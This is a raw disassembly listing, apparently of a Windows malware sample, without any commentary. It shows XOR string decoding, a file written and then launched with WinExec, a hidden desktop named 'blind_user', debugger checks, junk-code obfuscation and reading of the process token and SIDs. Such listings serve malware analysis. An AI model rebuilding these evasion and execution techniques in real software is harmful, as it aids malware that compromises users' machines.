lea edi, [ebp+var_1300]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CA30
add esp, 1Ch
call sub_40C514 ; GetCurrentThreadId
lea ecx, [ebp+var_10FE]
or eax, 0FFFFFFFFh
loc_4043FC: ; CODE XREF: sub_404194+26D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4043FC
push 0
lea esi, [ebp+var_14AC]
push esi
push eax
lea edi, [ebp+var_10FE]
push edi
push ebx
call sub_40C730 ; WriteFile
push ebx
call sub_40C55C ; CloseHandle
mov ebx, 5F3Bh
mov eax, ebx
add eax, ebx
mov ebx, eax
push 8
push offset aINvuni ; "ލ"
call sub_4040FC
add esp, 8
lea edi, [ebp+var_1201]
push edi
lea edi, [ebp+var_FF]
push edi
push eax
lea edi, [ebp+var_10FE]
push edi
call sub_40CA30
add esp, 10h
mov [ebp+var_1396], 0B7h
sub [ebp+var_1396], 77h
push 0
lea eax, [ebp+var_10FE]
push eax
call sub_40C724 ; WinExec
mov [ebp+var_1397], 22h
sub [ebp+var_1397], 6Ch
pop edi
pop esi
pop ebx
leave
retn
sub_404194 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 20Eh
push esi
push dword ptr [ebp+8]
mov eax, dword_441248
lea eax, ds:42FD00h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-8], 331h
xor edi, edi
jmp short loc_4044D6
; ---------------------------------------------------------------------------
loc_4044BC: ; CODE XREF: .text:004044D8�j
mov eax, dword_441248
add eax, edi
lea eax, ds:42FD00h[eax]
movsx edx, byte ptr [eax]
xor edx, 8Fh
mov [eax], dl
inc edi
loc_4044D6: ; CODE XREF: .text:004044BA�j
cmp edi, esi
jl short loc_4044BC
mov eax, dword_441248
add eax, esi
mov byte ptr ds:dword_42FD00[eax], 0
mov edi, dword_441248
inc dword_441248
mov eax, dword_441248
lea eax, [eax+esi+6]
mov dword_441248, eax
add dword_441248, 2
cmp dword_441248, 0DFDh
jle short loc_40451D
and dword_441248, 0
loc_40451D: ; CODE XREF: .text:00404514�j
lea eax, dword_42FD00[edi]
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
sub_404525 proc near ; DATA XREF: sub_43E731+A6�o
leave
retn
sub_404525 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404527 proc near ; CODE XREF: sub_4062CD+21B�p
; sub_408BE4+13D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
call sub_40C508 ; GetCurrentProcessId
cmp dword_44124C, 0
jz short loc_40456A
mov [ebp+var_C], 30A1h
inc [ebp+var_C]
call sub_40C514 ; GetCurrentThreadId
push eax
call sub_40C838 ; GetThreadDesktop
mov [ebp+var_10], eax
call sub_40C598 ; GetTickCount
mov eax, dword_44124C
cmp [ebp+var_10], eax
jnz short loc_40459E
xor eax, eax
inc eax
jmp short loc_4045B2
; ---------------------------------------------------------------------------
loc_40456A: ; CODE XREF: sub_404527+15�j
push 0
push 0C7h
push 0
push 0
push 0
push offset aBlind_user ; "blind_user"
sub_404527 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40457C proc near ; DATA XREF: sub_43E731+E0�o
call sub_40C820 ; CreateDesktopA
mov dword_44124C, eax
sub_40457C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404586 proc near ; DATA XREF: sub_43E731+476�o
lea edi, [ebp-8]
lea esi, aK0iJ_0 ; " K0i=J "
movsd
movsd
cmp dword_44124C, 0
jnz short loc_40459E
xor eax, eax
jmp short loc_4045B2
; ---------------------------------------------------------------------------
loc_40459E: ; CODE XREF: sub_404527+3C�j
; sub_404586+12�j
push dword_44124C
call sub_40C82C ; SetThreadDesktop
mov ebx, eax
call sub_40C5A4 ; GetVersion
mov eax, ebx
loc_4045B2: ; CODE XREF: sub_404527+41�j
; sub_404586+16�j
pop edi
pop esi
pop ebx
leave
retn
sub_404586 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B7 proc near ; CODE XREF: sub_4062CD+2A2�p
; sub_408BE4+18F�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_40C508 ; GetCurrentProcessId
mov eax, [ebp+arg_0]
lea edx, aBlind_user ; "blind_user"
mov [eax+8], edx
mov [ebp+var_2], 294Bh
movzx eax, [ebp+var_2]
imul eax, 2277h
mov [ebp+var_2], ax
leave
retn
sub_4045B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045E2 proc near ; CODE XREF: sub_404663+53�p
; sub_404663+97�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
sub_4045E2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4045EF proc near ; DATA XREF: sub_43E731+4B8�o
mov eax, dword_441260
lea eax, ds:416690h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov dword ptr [ebp-4], 249h
xor edi, edi
jmp short loc_404626
; ---------------------------------------------------------------------------
loc_40460F: ; CODE XREF: sub_4045EF+39�j
mov eax, dword_441260
add eax, edi
lea eax, ds:416690h[eax]
movsx edx, byte ptr [eax]
xor edx, 6Ch
mov [eax], dl
inc edi
loc_404626: ; CODE XREF: sub_4045EF+1E�j
cmp edi, esi
jl short loc_40460F
mov eax, dword_441260
add eax, esi
mov byte ptr ds:dword_416690[eax], 0
mov edi, dword_441260
mov eax, edi
add eax, 6
add eax, esi
mov dword_441260, eax
cmp eax, 0DACh
jle short loc_404659
and dword_441260, 0
loc_404659: ; CODE XREF: sub_4045EF+61�j
lea eax, dword_416690[edi]
pop edi
pop esi
leave
retn
sub_4045EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404663 proc near ; CODE XREF: sub_405601+6DB�p
; sub_405601+784�p ...
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10A = byte ptr -10Ah
var_109 = dword ptr -109h
var_105 = byte ptr -105h
var_103 = byte ptr -103h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_4]
push ebx
call sub_40CA54
add esp, 8
call sub_40C574 ; GetProcessHeap
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_40476E
call sub_40C538 ; RtlGetLastWin32Error
mov [ebp+var_FF], 0
call sub_40C634 ; IsDebuggerPresent
push 3
push offset dword_446504
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
lea edi, [ebp+var_10A]
lea esi, aUng9Q ; "unG9 Q"
mov ecx, 7
rep movsb
mov [ebp+var_103], 0
jmp short loc_40473C
; ---------------------------------------------------------------------------
loc_4046E1: ; CODE XREF: sub_404663+E1�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404735
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp+var_110], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_FF]
push edi
mov edi, [ebp+var_110]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
add esp, 18h
loc_404735: ; CODE XREF: sub_404663+8E�j
add [ebp+var_103], 1
loc_40473C: ; CODE XREF: sub_404663+7C�j
mov al, [ebp+var_103]
cmp al, 0Ah
jb short loc_4046E1
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CA54
push 3
push offset off_4464FB
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 18h
loc_40476E: ; CODE XREF: sub_404663+35�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404855
mov eax, dword_44126B
mov [ebp+var_109], eax
push 10h
push offset word_4464EA
call sub_4045E2
mov [ebp+var_110], eax
call sub_40CA18
mov [ebp+var_114], eax
call sub_40CA18
mov [ebp+var_118], eax
call sub_40CA18
mov [ebp+var_11C], eax
call sub_40CA18
mov ecx, 0EA60h
cdq
idiv ecx
push edx
mov edi, [ebp+var_11C]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_118]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_114]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_110]
push edi
lea edi, [ebp+var_FF]
push edi
call sub_40CA30
mov word ptr [ebp-104h], 6A38h
add word ptr [ebp-104h], 2C92h
lea eax, [ebp+var_FF]
push eax
push ebx
call sub_40CA54
add esp, 28h
mov [ebp+var_105], 0BDh
add [ebp+var_105], 1
loc_404855: ; CODE XREF: sub_404663+11B�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404905
mov eax, dword_44126F
mov [ebp+var_109+3], eax
push 0Ah
sub_404663 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404878 proc near ; DATA XREF: sub_43E731+55B�o
push offset byte_4464DF
call sub_4045E2
mov [ebp-10Ch], eax
call sub_40CA18
mov [ebp-110h], eax
call sub_40CA18
mov [ebp-114h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-114h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-110h]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp-10Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
call sub_40C5A4 ; GetVersion
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
add esp, 24h
loc_404905: ; CODE XREF: sub_404663+202�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_40492D
push 2
push offset aAf ; "af"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_40492D: ; CODE XREF: sub_404878+9D�j
mov word ptr [ebp-102h], 140Ah
movzx eax, word ptr [ebp-102h] ; DATA XREF: sub_43E731+41D�r
imul eax, 5B3Bh
mov [ebp-102h], ax
pop edi
pop esi
pop ebx
leave
retn
sub_404878 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40494F proc near ; CODE XREF: sub_405601+19F�p
; sub_405601+1BD�p ...
var_122 = dword ptr -122h
var_11E = word ptr -11Eh
var_105 = byte ptr -105h
var_104 = word ptr -104h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov [ebp+var_104], 30D1h
movzx eax, [ebp+var_104]
imul eax, 4FD6h
mov [ebp+var_104], ax
push [ebp+arg_4]
push ebx
call sub_40CA54
add esp, 8
mov [ebp+var_105], 34h
sub [ebp+var_105], 75h
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge loc_404B75
mov eax, dword_441273
mov [ebp+var_122], eax
mov [ebp+var_FF], 0
mov [ebp+var_11E], 6E30h
movzx eax, [ebp+var_11E]
imul eax, 1271h
mov [ebp+var_11E], ax
push 5
push offset aPmaal ; "PMAAL"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
sub_40494F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4049F0 proc near ; DATA XREF: sub_43E731+2A�o
mov byte ptr [ebp-11Bh], 0
jmp loc_404B3F
sub_4049F0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404A38
loc_4049FC: ; CODE XREF: sub_404A38+10F�j
mov byte ptr [ebp-129h], 28h
sub byte ptr [ebp-129h], 0A9h
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404A5E
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-130h], eax
call sub_40CA18
mov ecx, 1Ah
; END OF FUNCTION CHUNK FOR sub_404A38
; =============== S U B R O U T I N E =======================================
sub_404A38 proc near ; DATA XREF: sub_43F132+12�o
; FUNCTION CHUNK AT 004049FC SIZE 0000003C BYTES
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-130h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404A5E: ; CODE XREF: sub_404A38-1E�j
mov dword ptr [ebp-128h], 1B00h
mov eax, [ebp-128h]
mov edx, eax
add edx, eax
mov [ebp-128h], edx
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404ACC
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-134h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-134h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404ACC: ; CODE XREF: sub_404A38+50�j
call sub_40C514 ; GetCurrentThreadId
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 7
jge short loc_404B25
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-138h], eax
call sub_40CA18
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-138h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404B25: ; CODE XREF: sub_404A38+A9�j
lea edi, [ebp-12Ch]
lea esi, byte_441277
mov ecx, 3
rep movsb
add byte ptr [ebp-11Bh], 1
loc_404B3F: ; CODE XREF: sub_4049F0+7�j
mov al, [ebp-11Bh]
cmp al, 0Ah
jb loc_4049FC
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
call sub_40C538 ; RtlGetLastWin32Error
push 4
push offset aAarl ; "AARL"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 18h
loc_404B75: ; CODE XREF: sub_40494F+56�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
sub_404A38 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404B85 proc near ; DATA XREF: .data:0043F38E�o
; .data:0043F3B5�o ...
jge loc_404CFD
call sub_40C574 ; GetProcessHeap
mov byte ptr [ebp-0FFh], 0
call sub_40C574 ; GetProcessHeap
mov byte ptr [ebp-11Bh], 0
jmp loc_404CD1
; ---------------------------------------------------------------------------
loc_404BA8: ; CODE XREF: sub_404B85+154�j
call sub_40C538 ; RtlGetLastWin32Error
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404C01
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-12Ch], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-12Ch]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404C01: ; CODE XREF: sub_404B85+38�j
mov eax, dword_44127A
mov [ebp-127h], eax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 4
jge short loc_404C60
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-130h], eax
call sub_40CA18
mov ecx, 1Ah
cdq
idiv ecx
mov edi, edx
add edi, 41h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-130h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404C60: ; CODE XREF: sub_404B85+97�j
lea edi, [ebp-128h]
lea esi, byte_44127E
xor ecx, ecx
inc ecx
rep movsb
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 3
jge short loc_404CC5
push 4
push offset byte_4464FF
call sub_4045E2
mov [ebp-134h], eax
call sub_40CA18
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 30h
push edi
lea edi, [ebp-0FFh]
push edi
mov edi, [ebp-134h]
push edi
lea edi, [ebp-0FFh]
push edi
call sub_40CA30
add esp, 18h
loc_404CC5: ; CODE XREF: sub_404B85+FC�j
call sub_40C508 ; GetCurrentProcessId
add byte ptr [ebp-11Bh], 1
loc_404CD1: ; CODE XREF: sub_404B85+1E�j
mov al, [ebp-11Bh]
cmp al, 32h
jb loc_404BA8
lea eax, [ebp-0FFh]
push eax
push ebx
call sub_40CA54
add esp, 8
lea edi, [ebp-123h]
lea esi, aC6kP9 ; "C6k|P=9"
movsd
movsd
loc_404CFD: ; CODE XREF: sub_404B85�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short sub_404D25
push 4
push offset dword_4464CC
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
sub_404B85 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D25 proc near ; CODE XREF: sub_404B85+188�j
; DATA XREF: .data:0043F01D�o ...
call sub_40C598 ; GetTickCount
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D52
sub_404D25 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D3C proc near ; DATA XREF: .data:0043EF74�o
push 3
push offset dword_4464C8
call sub_4045E2
push eax
sub_404D3C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D49 proc near ; DATA XREF: .data:0043EF1A�o
push ebx
call sub_40CA54
add esp, 10h
loc_404D52: ; CODE XREF: sub_404D25+15�j
mov byte ptr [ebp-106h], 0D0h
movzx eax, byte ptr [ebp-106h]
imul eax, 7F98h
mov [ebp-106h], al
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404D94
push 3
push offset dword_4464C4
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404D94: ; CODE XREF: sub_404D49+33�j
lea edi, [ebp-10Ch]
lea esi, a04Ku ; "04 kU"
mov ecx, 3
rep movsw
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404DD0
push 3
push offset dword_4464C0
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404DD0: ; CODE XREF: sub_404D49+6F�j
call sub_40C574 ; GetProcessHeap
call sub_40CA18
mov ecx, 0Ah
sub_404D49 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DDF proc near ; DATA XREF: .data:0043E3F0�o
cdq
idiv ecx
cmp edx, 5
sub_404DDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DE5 proc near ; DATA XREF: sub_43E245:loc_43E2AA�o
jge short loc_404DFD
push 4
push offset byte_4464BB
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404DFD: ; CODE XREF: sub_404DE5�j
mov word ptr [ebp-102h], 342h
movzx eax, word ptr [ebp-102h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-102h], ax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E42
push 4
push offset word_4464B6
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404E42: ; CODE XREF: sub_404DE5+45�j
mov ax, word_44128D
mov [ebp-10Eh], ax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404E77
push 4
push offset byte_4464B1
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404E77: ; CODE XREF: sub_404DE5+7A�j
lea edi, [ebp-113h]
lea esi, aVpa1 ; "PA1"
mov ecx, 5
rep movsb
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EB2
push 7
push offset byte_4464A9
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404EB2: ; CODE XREF: sub_404DE5+B5�j
lea edi, [ebp-118h]
lea esi, a@0y ; "@0Y "
mov ecx, 5
rep movsb
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404EED
push 8
push offset dword_4464A0
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404EED: ; CODE XREF: sub_404DE5+F0�j
mov ax, word_441299
mov [ebp-11Ah], ax
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F22
push 9
push offset word_446496
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404F22: ; CODE XREF: sub_404DE5+125�j
call sub_40CA18
mov ecx, 0Ah
cdq
idiv ecx
cmp edx, 5
jge short loc_404F4A
push 2
push offset aAf ; "af"
call sub_4045E2
push eax
push ebx
call sub_40CA54
add esp, 10h
loc_404F4A: ; CODE XREF: sub_404DE5+14D�j
pop edi
pop esi
pop ebx
leave
retn
sub_404DE5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F4F proc near ; CODE XREF: sub_404FEF+64�p
; sub_404FEF+A6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 138h
push esi
push [ebp+arg_0]
mov eax, dword_4412A4
lea eax, ds:435040h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_404F94
; ---------------------------------------------------------------------------
loc_404F7D: ; CODE XREF: sub_404F4F+47�j
mov eax, dword_4412A4
add eax, edi
lea eax, ds:435040h[eax]
movsx edx, byte ptr [eax]
xor edx, 31h
mov [eax], dl
inc edi
loc_404F94: ; CODE XREF: sub_404F4F+2C�j
cmp edi, esi
jl short loc_404F7D
mov eax, dword_4412A4
add eax, esi
mov byte ptr ds:dword_435040[eax], 0
xor edi, edi
mov edi, dword_4412A4
inc dword_4412A4
mov eax, dword_4412A4
add eax, 3
add eax, esi
mov dword_4412A4, eax
add dword_4412A4, 2
cmp dword_4412A4, 0DCBh
jle short loc_404FDE
and dword_4412A4, 0
loc_404FDE: ; CODE XREF: sub_404F4F+86�j
mov [ebp+var_8], 199h
lea eax, dword_435040[edi]
pop edi
pop esi
leave
retn
sub_404F4F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FEF proc near ; CODE XREF: sub_40518F+A5�p
var_2C = dword ptr -2Ch
var_25 = byte ptr -25h
var_24 = dword ptr -24h
var_1F = word ptr -1Fh
var_1D = dword ptr -1Dh
var_19 = byte ptr -19h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
lea edi, [ebp+var_19]
lea esi, aU ; ":U*~"
mov ecx, 5
rep movsb
call sub_40C508 ; GetCurrentProcessId
xor ebx, ebx
inc ebx
push [ebp+arg_0]
call sub_40C97C ; GetSidIdentifierAuthority
mov [ebp+var_14], eax
mov eax, dword_4412AD
mov [ebp+var_1D], eax
push [ebp+arg_0]
call sub_40C994 ; GetSidSubAuthorityCount
movzx edi, byte ptr [eax]
mov [ebp+var_10], edi
call sub_40C514 ; GetCurrentThreadId
mov eax, 0Ch
mul [ebp+var_10]
mov [ebp+var_24], eax
add eax, 1Ch
mov [ebp+var_C], eax
call sub_40C634 ; IsDebuggerPresent
push 6
push offset byte_44648F
call sub_404F4F
push ebx
push eax
push [ebp+arg_4]
call sub_40C868 ; wsprintfA
add esp, 14h
mov [ebp+var_C], eax
mov ax, word_4412B1
mov [ebp+var_1F], ax
mov eax, [ebp+var_C]
add eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov eax, [ebp+var_14]
cmp byte ptr [eax], 0
jnz short loc_405089
cmp byte ptr [eax+1], 0
jz short loc_4050E7
loc_405089: ; CODE XREF: sub_404FEF+92�j
call sub_40C574 ; GetProcessHeap
push 20h
push offset word_44646E
call sub_404F4F
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx esi, si
push esi
movzx esi, byte ptr [edi+4]
movzx esi, si
push esi
movzx esi, byte ptr [edi+3]
movzx esi, si
push esi
movzx esi, byte ptr [edi+2]
movzx esi, si
push esi
movzx esi, byte ptr [edi+1]
movzx esi, si
push esi
movzx edi, byte ptr [edi]
movzx edi, di
push edi
push eax
push [ebp+var_8]
call sub_40C868 ; wsprintfA
add esp, 28h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
jmp short loc_405139
; ---------------------------------------------------------------------------
loc_4050E7: ; CODE XREF: sub_404FEF+98�j
call sub_40C508 ; GetCurrentProcessId
push 3
push offset off_44646A
call sub_404F4F
mov edi, [ebp+var_14]
movzx esi, byte ptr [edi+5]
movzx edx, byte ptr [edi+4]
shl edx, 8
add esi, edx
movzx edx, byte ptr [edi+3]
shl edx, 10h
add esi, edx
movzx edi, byte ptr [edi+2]
shl edi, 18h
add esi, edi
push esi
push eax
push [ebp+var_8]
call sub_40C868 ; wsprintfA
add esp, 14h
mov ebx, eax
call sub_40C634 ; IsDebuggerPresent
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
loc_405139: ; CODE XREF: sub_404FEF+F6�j
and [ebp+var_4], 0
jmp short loc_405182
; ---------------------------------------------------------------------------
loc_40513F: ; CODE XREF: sub_404FEF+199�j
mov [ebp+var_25], 81h
add [ebp+var_25], 0F0h
push 4
push offset byte_446465
call sub_404F4F
mov [ebp+var_2C], eax
push [ebp+var_4]
push [ebp+arg_0]
call sub_40C988 ; GetSidSubAuthority
push dword ptr [eax]
mov edi, [ebp+var_2C]
push edi
push [ebp+var_8]
call sub_40C868 ; wsprintfA
add esp, 14h
mov ebx, eax
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+var_4]
loc_405182: ; CODE XREF: sub_404FEF+14E�j
mov eax, [ebp+var_10]
cmp [ebp+var_4], eax
jb short loc_40513F
pop edi
pop esi
pop ebx
leave
retn
sub_404FEF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40518F proc near ; CODE XREF: sub_405F79+218�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
call sub_40C514 ; GetCurrentThreadId
call sub_40C508 ; GetCurrentProcessId
mov [ebp+var_10], eax
call sub_40C508 ; GetCurrentProcessId
push [ebp+var_10]
push 0
push 1F0FFFh
call sub_40C670 ; OpenProcess
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 0F00FFh
push ebx
call sub_40C904 ; OpenProcessToken
mov [ebp+var_8], 2A34h
add [ebp+var_8], 17B3h
push ebx
call sub_40C55C ; CloseHandle
lea edi, [ebp+var_11]
lea esi, byte_4412B3
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_4412A0
add eax, 3FF5h
push eax
push 40h
call sub_40C64C ; LocalAlloc
mov ebx, eax
mov [ebp+var_C], 2D3Bh
mov eax, 2E30h
mul [ebp+var_C]
mov [ebp+var_1C], eax
mov [ebp+var_C], eax
lea eax, [ebp+var_18]
push eax
mov eax, dword_44129C
add eax, 4000h
push eax
push ebx
push 1
push [ebp+var_4]
call sub_40C910 ; GetTokenInformation
push [ebp+arg_0]
push dword ptr [ebx]
call sub_404FEF
add esp, 8
call sub_40C508 ; GetCurrentProcessId
push ebx
call sub_40C658 ; LocalFree
push [ebp+var_4]
call sub_40C55C ; DATA XREF: sub_43F53D�r
pop edi
loc_405250: ; DATA XREF: sub_43F549�r
pop esi
pop ebx
leave
retn
sub_40518F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405254 proc near ; CODE XREF: sub_4053A1+3E�p
; sub_4053A1+AD�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch ; DATA XREF: sub_43F561�r
push esi
push edi
loc_40525C: ; DATA XREF: sub_43F56D�r
mov esi, [ebp+arg_4]
mov [ebp+var_4], 2 ; DATA XREF: sub_43F579�r sub_43F585�r
push esi
push [ebp+arg_0] ; DATA XREF: sub_43F591�r
mov eax, dword_4412BC ; DATA XREF: sub_43F59D�r
lea eax, ds:418710h[eax] ; DATA XREF: sub_43F5A9�r
; sub_43F5B5�r
push eax
